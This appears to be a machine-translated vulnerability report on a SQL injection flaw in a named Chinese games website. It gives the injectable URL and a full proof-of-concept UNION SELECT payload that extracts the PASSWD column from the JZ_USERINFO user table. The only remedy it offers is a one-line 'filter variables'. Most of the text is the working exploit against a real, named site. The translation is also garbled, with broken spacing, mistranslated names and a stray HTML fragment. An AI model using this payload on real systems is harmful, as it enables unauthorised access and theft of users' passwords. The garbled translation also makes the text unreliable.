Detailed description:
The injection URL for the power game site in Silicon Valley is:
Http:/games.enet.com.cn/zhuanti/zx/action/article_v.shtml? Id = 102929
Use the union query to find out that eight fields are replaced with null, which can be used to guess the user account and password, resulting in leakage of user sensitive information.
Proof of vulnerability:
Html? Id = 102929% 20and % 201 = 2% 20 union % 20all % 20 select % 20 null, chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | PASSWD, null, null % 20 from % 20JZ_USERINFO "> http://games.enet.com.cn/zhuanti/zx/action/article_v.shtml? Id = 102929% 20and % 201 = 2% 20 union % 20all % 20 select % 20 null, chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | chr % 2894% 29 | PASSWD, null, null % 20 from % 20JZ_USERINFO
Solution:
Filter variables.